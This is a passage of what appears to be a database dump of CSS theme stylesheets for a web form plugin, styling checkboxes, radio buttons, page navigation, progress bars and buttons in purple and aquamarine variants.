{\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #FFF;\r\n	cursor: pointer;\r\n	background-color: #5C00DA;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #5C00DA ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #5C00DA ), color-stop(49%, #5C00DB ), color-stop(84%, #6600F0 ), color-stop(99%, #7917FF )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #D9D7D8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #fff;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(8,'Theme 02 transparent (aquamarine button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #EAF9F3;\r\nborder: 1px solid #4D4A58;\r\nmargin-bottom: 10px;\r\ncolor: #4D4A58;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #94FFD5;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right  #E4F3E2;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #94FFD5;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left  #E4F3E2;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #94FFD5;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/02/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #EEEEEE;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #EEEEEE;\r\n}\r\n.page_active {\r\n	color: #3F3927;\r\n	cursor: pointer;\r\n	background-color: #CEECE2;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #95D3BE ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #80CEB4 ), color-stop(49%, #95D6C1 ), color-stop(84%, #95D3BE ), color-stop(99%, #B3E7D6 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #E0DFE0;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #292929;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	